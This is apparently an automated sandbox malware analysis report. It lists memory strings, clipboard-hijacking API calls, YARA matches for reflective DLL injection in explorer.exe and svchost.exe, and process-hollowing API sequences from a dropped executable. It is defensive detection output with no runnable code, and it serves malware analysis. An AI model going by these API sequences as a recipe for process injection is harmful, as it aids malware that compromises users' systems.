Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: libcrypto-1_1.dll.17.dr String found in binary or memory: https://www.openssl.org/H
Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Contains functionality for read data from the clipboard
Source: C:\Windows\explorer.exe Code function: 4_2_0E908580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_0E908580
Contains functionality to modify clipboard data
Source: C:\Windows\explorer.exe Code function: 4_2_0E930F90 SetClipboardData, 4_2_0E930F90
Source: C:\Windows\explorer.exe Code function: 4_2_0E908580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_0E908580
Source: C:\Windows\explorer.exe Code function: 4_2_0F4E0F90 SetClipboardData, 4_2_0F4E0F90
Source: C:\Windows\explorer.exe Code function: 4_2_0F4B8580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_0F4B8580
Source: C:\Windows\explorer.exe Code function: 4_2_10D78580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_10D78580
Source: C:\Windows\explorer.exe Code function: 4_2_10DA0F90 SetClipboardData, 4_2_10DA0F90
Contains functionality to read the clipboard data
Source: C:\Windows\explorer.exe Code function: 4_2_0E908390 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 4_2_0E908390

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.explorer.exe.a020000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.cb95950.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.e8f0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.svchost.exe.1301d095000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.svchost.exe.1301d095000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.e8f0000.4.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.10d60000.6.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.3.explorer.exe.cb95950.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.e8a0000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.f4a0000.4.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.a020000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.cb95950.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.f4a0000.5.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.e8a0000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.e8a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.e8f0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.3.explorer.exe.cb95950.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.c350000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.e8f0000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.c350000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.f4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.10d60000.6.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.0.explorer.exe.f4a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.2.explorer.exe.e8a0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.1850269906.000000000A020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.1853413572.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000004.00000000.1851595360.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree, 0_2_00007FF63A831F8C
Source: C:\Windows\explorer.exe Code function: 4_2_0E91F420 InternetReadFile,NtQueryInformationProcess, 4_2_0E91F420
Source: C:\Windows\explorer.exe Code function: 4_2_0E91F420 InternetReadFile,NtQueryInformationProcess, 4_2_0E91F420
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 4_2_0E8F1370
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CF420 InternetReadFile,NtQueryInformationProcess, 4_2_0F4CF420
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CF420 InternetReadFile,NtQueryInformationProcess, 4_2_0F4CF420
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 4_2_0F4A1370
Source: C:\Windows\explorer.exe Code function: 4_2_10D61370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 4_2_10D61370
Source: C:\Windows\explorer.exe Code function: 4_2_10D8F420 InternetReadFile,NtQueryInformationProcess, 4_2_10D8F420
Source: C:\Windows\explorer.exe Code function: 4_2_10D8F420 InternetReadFile,NtQueryInformationProcess, 4_2_10D8F420
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C1F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree, 5_2_00007FF7821C1F8C
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A833360 0_2_00007FF63A833360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831F8C 0_2_00007FF63A831F8C
Source: C:\Windows\System32\svchost.exe Code function: 2_2_00007FF6EEF23360 2_2_00007FF6EEF23360
Source: C:\Windows\System32\svchost.exe Code function: 2_2_00007FF6EEF21F8C 2_2_00007FF6EEF21F8C
Source: C:\Windows\explorer.exe Code function: 4_2_0A04AA00 4_2_0A04AA00
Source: C:\Windows\explorer.exe Code function: 4_2_0A04B254 4_2_0A04B254
Source: C:\Windows\explorer.exe Code function: 4_2_0A04C29C 4_2_0A04C29C
Source: C:\Windows\explorer.exe Code function: 4_2_0A047AD4 4_2_0A047AD4
Source: C:\Windows\explorer.exe Code function: 4_2_0A03E2E8 4_2_0A03E2E8
Source: C:\Windows\explorer.exe Code function: 4_2_0A025B00 4_2_0A025B00
Source: C:\Windows\explorer.exe Code function: 4_2_0A0433D0 4_2_0A0433D0
Source: C:\Windows\explorer.exe Code function: 4_2_0A033BE0 4_2_0A033BE0
Source: C:\Windows\explorer.exe Code function: 4_2_0A043020 4_2_0A043020
Source: C:\Windows\explorer.exe Code function: 4_2_0A04C832 4_2_0A04C832
Source: C:\Windows\explorer.exe Code function: 4_2_0A0480F8 4_2_0A0480F8
Source: C:\Windows\explorer.exe Code function: 4_2_0A03E928 4_2_0A03E928
Source: C:\Windows\explorer.exe Code function: 4_2_0A0409BC 4_2_0A0409BC
Source: C:\Windows\explorer.exe Code function: 4_2_0A02660D 4_2_0A02660D
Source: C:\Windows\explorer.exe Code function: 4_2_0A026617 4_2_0A026617
Source: C:\Windows\explorer.exe Code function: 4_2_0A026621 4_2_0A026621
Source: C:\Windows\explorer.exe Code function: 4_2_0A02662B 4_2_0A02662B
Source: C:\Windows\explorer.exe Code function: 4_2_0A026633 4_2_0A026633
Source: C:\Windows\explorer.exe Code function: 4_2_0A02663D 4_2_0A02663D
Source: C:\Windows\explorer.exe Code function: 4_2_0A020E40 4_2_0A020E40
Source: C:\Windows\explorer.exe Code function: 4_2_0A040724 4_2_0A040724
Source: C:\Windows\explorer.exe Code function: 4_2_0A048C78 4_2_0A048C78
Source: C:\Windows\explorer.exe Code function: 4_2_0A026580 4_2_0A026580
Source: C:\Windows\explorer.exe Code function: 4_2_0C378C78 4_2_0C378C78
Source: C:\Windows\explorer.exe Code function: 4_2_0C356580 4_2_0C356580
Source: C:\Windows\explorer.exe Code function: 4_2_0C356633 4_2_0C356633
Source: C:\Windows\explorer.exe Code function: 4_2_0C35663D 4_2_0C35663D
Source: C:\Windows\explorer.exe Code function: 4_2_0C356621 4_2_0C356621
Source: C:\Windows\explorer.exe Code function: 4_2_0C35662B 4_2_0C35662B
Source: C:\Windows\explorer.exe Code function: 4_2_0C356617 4_2_0C356617
Source: C:\Windows\explorer.exe Code function: 4_2_0C35660D 4_2_0C35660D
Source: C:\Windows\explorer.exe Code function: 4_2_0C350E40 4_2_0C350E40
Source: C:\Windows\explorer.exe Code function: 4_2_0C370724 4_2_0C370724
Source: C:\Windows\explorer.exe Code function: 4_2_0C37C832 4_2_0C37C832
Source: C:\Windows\explorer.exe Code function: 4_2_0C373020 4_2_0C373020
Source: C:\Windows\explorer.exe Code function: 4_2_0C3780F8 4_2_0C3780F8
Source: C:\Windows\explorer.exe Code function: 4_2_0C36E928 4_2_0C36E928
Source: C:\Windows\explorer.exe Code function: 4_2_0C3709BC 4_2_0C3709BC
Source: C:\Windows\explorer.exe Code function: 4_2_0C37AA00 4_2_0C37AA00
Source: C:\Windows\explorer.exe Code function: 4_2_0C37B254 4_2_0C37B254
Source: C:\Windows\explorer.exe Code function: 4_2_0C37C29C 4_2_0C37C29C
Source: C:\Windows\explorer.exe Code function: 4_2_0C36E2E8 4_2_0C36E2E8
Source: C:\Windows\explorer.exe Code function: 4_2_0C377AD4 4_2_0C377AD4
Source: C:\Windows\explorer.exe Code function: 4_2_0C355B00 4_2_0C355B00
Source: C:\Windows\explorer.exe Code function: 4_2_0C363BE0 4_2_0C363BE0
Source: C:\Windows\explorer.exe Code function: 4_2_0C3733D0 4_2_0C3733D0
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A660D 4_2_0E8A660D
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A6617 4_2_0E8A6617
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A662B 4_2_0E8A662B
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A6621 4_2_0E8A6621
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A663D 4_2_0E8A663D
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A6633 4_2_0E8A6633
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A0E40 4_2_0E8A0E40
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C0724 4_2_0E8C0724
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C8C78 4_2_0E8C8C78
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A6580 4_2_0E8A6580
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CC29C 4_2_0E8CC29C
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C7AD4 4_2_0E8C7AD4
Source: C:\Windows\explorer.exe Code function: 4_2_0E8BE2E8 4_2_0E8BE2E8
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CAA00 4_2_0E8CAA00
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CB254 4_2_0E8CB254
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C33D0 4_2_0E8C33D0
Source: C:\Windows\explorer.exe Code function: 4_2_0E8B3BE0 4_2_0E8B3BE0
Source: C:\Windows\explorer.exe Code function: 4_2_0E8A5B00 4_2_0E8A5B00
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C80F8 4_2_0E8C80F8
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C3020 4_2_0E8C3020
Source: C:\Windows\explorer.exe Code function: 4_2_0E8CC832 4_2_0E8CC832
Source: C:\Windows\explorer.exe Code function: 4_2_0E8C09BC 4_2_0E8C09BC
Source: C:\Windows\explorer.exe Code function: 4_2_0E8BE928 4_2_0E8BE928
Source: C:\Windows\explorer.exe Code function: 4_2_0E9047E0 4_2_0E9047E0
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F6700 4_2_0E8F6700
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F1A40 4_2_0E8F1A40
Source: C:\Windows\explorer.exe Code function: 4_2_0E91CE9C 4_2_0E91CE9C
Source: C:\Windows\explorer.exe Code function: 4_2_0E9186D4 4_2_0E9186D4
Source: C:\Windows\explorer.exe Code function: 4_2_0E90EEE8 4_2_0E90EEE8
Source: C:\Windows\explorer.exe Code function: 4_2_0E91B600 4_2_0E91B600
Source: C:\Windows\explorer.exe Code function: 4_2_0E91BE54 4_2_0E91BE54
Source: C:\Windows\explorer.exe Code function: 4_2_0E913FD0 4_2_0E913FD0
Source: C:\Windows\explorer.exe Code function: 4_2_0E918CF8 4_2_0E918CF8
Source: C:\Windows\explorer.exe Code function: 4_2_0E91D432 4_2_0E91D432
Source: C:\Windows\explorer.exe Code function: 4_2_0E913C20 4_2_0E913C20
Source: C:\Windows\explorer.exe Code function: 4_2_0E9115BC 4_2_0E9115BC
Source: C:\Windows\explorer.exe Code function: 4_2_0E90F528 4_2_0E90F528
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F720D 4_2_0E8F720D
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7217 4_2_0E8F7217
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F722B 4_2_0E8F722B
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7221 4_2_0E8F7221
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F723D 4_2_0E8F723D
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7233 4_2_0E8F7233
Source: C:\Windows\explorer.exe Code function: 4_2_0E911324 4_2_0E911324
Source: C:\Windows\explorer.exe Code function: 4_2_0E919878 4_2_0E919878
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7180 4_2_0E8F7180
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A6700 4_2_0F4A6700
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C3FD0 4_2_0F4C3FD0
Source: C:\Windows\explorer.exe Code function: 4_2_0F4B47E0 4_2_0F4B47E0
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CBE54 4_2_0F4CBE54
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CB600 4_2_0F4CB600
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C86D4 4_2_0F4C86D4
Source: C:\Windows\explorer.exe Code function: 4_2_0F4BEEE8 4_2_0F4BEEE8
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CCE9C 4_2_0F4CCE9C
Source: C:\Windows\explorer.exe Code function: 4_2_0F4BF528 4_2_0F4BF528
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C15BC 4_2_0F4C15BC
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C3C20 4_2_0F4C3C20
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CD432 4_2_0F4CD432
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C8CF8 4_2_0F4C8CF8
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C1324 4_2_0F4C1324
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A1A40 4_2_0F4A1A40
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A720D 4_2_0F4A720D
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A7217 4_2_0F4A7217
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A722B 4_2_0F4A722B
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A7221 4_2_0F4A7221
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A723D 4_2_0F4A723D
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A7233 4_2_0F4A7233
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A7180 4_2_0F4A7180
Source: C:\Windows\explorer.exe Code function: 4_2_0F4C9878 4_2_0F4C9878
Source: C:\Windows\explorer.exe Code function: 4_2_10D89878 4_2_10D89878
Source: C:\Windows\explorer.exe Code function: 4_2_10D67180 4_2_10D67180
Source: C:\Windows\explorer.exe Code function: 4_2_10D61A40 4_2_10D61A40
Source: C:\Windows\explorer.exe Code function: 4_2_10D67217 4_2_10D67217
Source: C:\Windows\explorer.exe Code function: 4_2_10D6720D 4_2_10D6720D
Source: C:\Windows\explorer.exe Code function: 4_2_10D67233 4_2_10D67233
Source: C:\Windows\explorer.exe Code function: 4_2_10D6723D 4_2_10D6723D
Source: C:\Windows\explorer.exe Code function: 4_2_10D67221 4_2_10D67221
Source: C:\Windows\explorer.exe Code function: 4_2_10D6722B 4_2_10D6722B
Source: C:\Windows\explorer.exe Code function: 4_2_10D81324 4_2_10D81324
Source: C:\Windows\explorer.exe Code function: 4_2_10D88CF8 4_2_10D88CF8
Source: C:\Windows\explorer.exe Code function: 4_2_10D8D432 4_2_10D8D432
Source: C:\Windows\explorer.exe Code function: 4_2_10D83C20 4_2_10D83C20
Source: C:\Windows\explorer.exe Code function: 4_2_10D815BC 4_2_10D815BC
Source: C:\Windows\explorer.exe Code function: 4_2_10D7F528 4_2_10D7F528
Source: C:\Windows\explorer.exe Code function: 4_2_10D886D4 4_2_10D886D4
Source: C:\Windows\explorer.exe Code function: 4_2_10D7EEE8 4_2_10D7EEE8
Source: C:\Windows\explorer.exe Code function: 4_2_10D8CE9C 4_2_10D8CE9C
Source: C:\Windows\explorer.exe Code function: 4_2_10D8BE54 4_2_10D8BE54
Source: C:\Windows\explorer.exe Code function: 4_2_10D8B600 4_2_10D8B600
Source: C:\Windows\explorer.exe Code function: 4_2_10D83FD0 4_2_10D83FD0
Source: C:\Windows\explorer.exe Code function: 4_2_10D747E0 4_2_10D747E0
Source: C:\Windows\explorer.exe Code function: 4_2_10D66700 4_2_10D66700
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C1F8C 5_2_00007FF7821C1F8C
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C3360 5_2_00007FF7821C3360
Source: C:\Windows\System32\audiodg.exe Code function: 7_2_00007FF6626D3360 7_2_00007FF6626D3360
Source: C:\Windows\System32\audiodg.exe Code function: 7_2_00007FF6626D1F8C 7_2_00007FF6626D1F8C
Source: C:\Windows\System32\msiexec.exe Code function: 8_2_00007FF7F2D03360 8_2_00007FF7F2D03360
Source: C:\Windows\System32\msiexec.exe Code function: 8_2_00007FF7F2D01F8C 8_2_00007FF7F2D01F8C
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Code function: 9_2_0137DC74 9_2_0137DC74
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E1000 17_2_00007FF69F3E1000
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F405C74 17_2_00007FF69F405C74
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3FFBD8 17_2_00007FF69F3FFBD8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3FD880 17_2_00007FF69F3FD880
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F5040 17_2_00007FF69F3F5040
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F1074 17_2_00007FF69F3F1074
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F28C0 17_2_00007FF69F3F28C0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E979B 17_2_00007FF69F3E979B
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E9FCD 17_2_00007FF69F3E9FCD
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F0E70 17_2_00007FF69F3F0E70
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F404F10 17_2_00007FF69F404F10
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F402F20 17_2_00007FF69F402F20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F1F30 17_2_00007FF69F3F1F30
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3FFBD8 17_2_00007FF69F3FFBD8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F405728 17_2_00007FF69F405728
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3FCD6C 17_2_00007FF69F3FCD6C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E95FB 17_2_00007FF69F3E95FB
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F1484 17_2_00007FF69F3F1484
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F0C64 17_2_00007FF69F3F0C64
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F2CC4 17_2_00007FF69F3F2CC4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F400B84 17_2_00007FF69F400B84
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F4033BC 17_2_00007FF69F4033BC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F73F4 17_2_00007FF69F3F73F4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F1280 17_2_00007FF69F3F1280
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F7AAC 17_2_00007FF69F3F7AAC
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F408A38 17_2_00007FF69F408A38
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F0A60 17_2_00007FF69F3F0A60
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3E8B20 17_2_00007FF69F3E8B20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F40518C 17_2_00007FF69F40518C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F91B0 17_2_00007FF69F3F91B0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3FD200 17_2_00007FF69F3FD200
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3E1000 18_2_00007FF69F3E1000
